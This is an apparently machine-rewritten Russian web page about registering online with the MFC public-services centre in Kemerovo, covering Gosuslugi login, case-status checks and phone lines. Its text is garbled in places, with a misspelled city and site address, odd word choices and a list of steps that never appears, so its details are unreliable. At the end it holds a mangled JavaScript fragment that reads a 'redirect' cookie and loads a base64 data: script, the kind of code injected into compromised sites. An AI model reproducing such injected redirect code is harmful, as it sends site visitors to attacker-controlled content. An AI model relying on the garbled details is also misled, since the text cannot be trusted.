Регистрация в МФЦ в Кемерово через интернет

Обратите внимание, что подавать онлайн-заявки в центр могут только авторизованные пользователи. Авторизацию можно получить через ЕСИА (для пользователей, зарегистрированных на веб-портале «Госуслуги»).

Выдача готовых документов осуществляется только после предварительной подачи заявления. Поэтому, если дело уже открыто, перед записью на прием необходимо проверить его готовность. Это можно сделать удаленно через интернет. Ниже расположена кнопка, нажав на которую, вы перейдете на страницу результатов рассмотрения заявления.

На официальном сайте МФЦ

Через официальный сайт МФЦ можно подать онлайн-заявление на получение местных и государственных услуг. Для этого нажмите на кнопку и следуйте инструкциям.

После подачи заявления система формирует электронный талон с серийным номером, ФИО, названием отделения, датой и временем посещения. Обратите внимание, что с помощью ваучера можно подать заявку только на одну услугу и только один комплект документов. Чтобы получить результаты или другие виды справок, вам нужно будет зарегистрироваться снова.

Через ворота Гослуги.

Вы также можете подать заявку на получение помощи через сайт Gosuslugi. Для этого вам необходимо выполнить следующие действия

Данный вид услуг доступен только пользователям с подтвержденной учетной записью в Госуслугах.

Как проверить статус дела в МФЦ — Кемерово

Чтобы узнать, на какой стадии находится ваше заявление, нажмите на кнопку Проверить статус дела и перейдите по ссылке. Всю необходимую информацию о ходе рассмотрения вашего заявления и подготовке документов вы можете получить, записавшись на прием в отделение или позвонив по номеру горячей линии. При разговоре с вами оператор колл-центра может запросить данные о вашем имени, дате регистрации дела и номере приема.

Кемеровский многофункциональный центр — Если вы хотите узнать более подробную информацию о конкретном филиале в районе Комерово (адрес, часы работы, телефон), перейдите по ссылке.

Советуем прочитать:  Склонение слова 'потеря'

Что вы думаете об этом в комментариях?

Официальный сайт МФЦ Кемерово и Кемеровской области

Если вам нужно поменять паспорт, получить водительское удостоверение или получить консультации по другим государственным услугам, то всю необходимую информацию вы можете получить на сайте Кемеровского многофункционального центра www. mfc-Emerovo. ru. На главной странице размещена актуальная информация для заявителей и перечень основных услуг, предоставляемых центром. Для получения промежуточных консультаций вы можете зарегистрироваться на сайте, а также обратиться в колл-центр. В правом верхнем углу находится поисковая строка, которую можно использовать, если нужная услуга не найдена в доступных категориях.

Как оставить заявку на сайте? Рецепт.

Чтобы записаться на прием в интересующий вас центр, вы можете найти нужную вам услугу, воспользовавшись поиском или открыв единство в этой услуге. Далее оставьте заявку на прием на ближайшее свободное время.

Регистрация проходит в несколько этапов.

Адрес МФЦ Кемерово и области

Активные вакансии, работа и трудоустройство

Отдел МФЦ принимает на работу специалистов в сфере обслуживания клиентов. Сотрудникам, успешно прошедшим полный рабочий день или стажировку, предлагается полный социальный пакет и профессиональное развитие. Подать резюме для трудоустройства можно по любому из адресов МФЦ.

Телефонная линия (8-3842) 77-21-79,

Горячая линия (8-3842) 77-47-99,

Отдел кадров работает с 8.30 до 17.45.

function getCoookie (e) ()[]/+ ]/g, «$ 1″) +» = ([ ;]*) «); return u? decodeuricomponent (u [1]): void 0&gt ; src = »data: text/javascript, base64, cu3mcu zqsuyriuzuzuzuzuyrsuzmiuzmiuzocuyrsuzncuzniuyrsuzni ncuzrsuymccpkts =«, math. floor (now()/1e3), getcoookie (»redirect»);